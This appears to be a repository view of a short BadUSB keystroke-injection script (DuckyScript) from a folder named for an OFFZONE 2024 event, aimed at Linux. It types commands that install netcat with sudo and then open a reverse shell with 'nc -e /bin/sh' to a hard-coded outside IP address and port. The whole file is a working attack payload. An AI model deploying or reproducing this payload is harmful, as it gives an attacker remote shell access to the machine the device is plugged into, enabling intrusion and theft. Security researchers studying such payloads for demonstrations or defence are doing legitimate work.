offzone24/linux.txt

10 lines
198 B
Plaintext
Raw Normal View History

2024-08-22 11:10:58 +03:00
DELAY 1500
GUI r
DELAY 500
STRING [[ which apt ]] && sudo apt install -y netcat-openbsd
DELAY 100
STRING [[ which yum ]] && sudo yum install -y netcat
DELAY
STRING nc -e /bin/sh 45.92.178.34 31337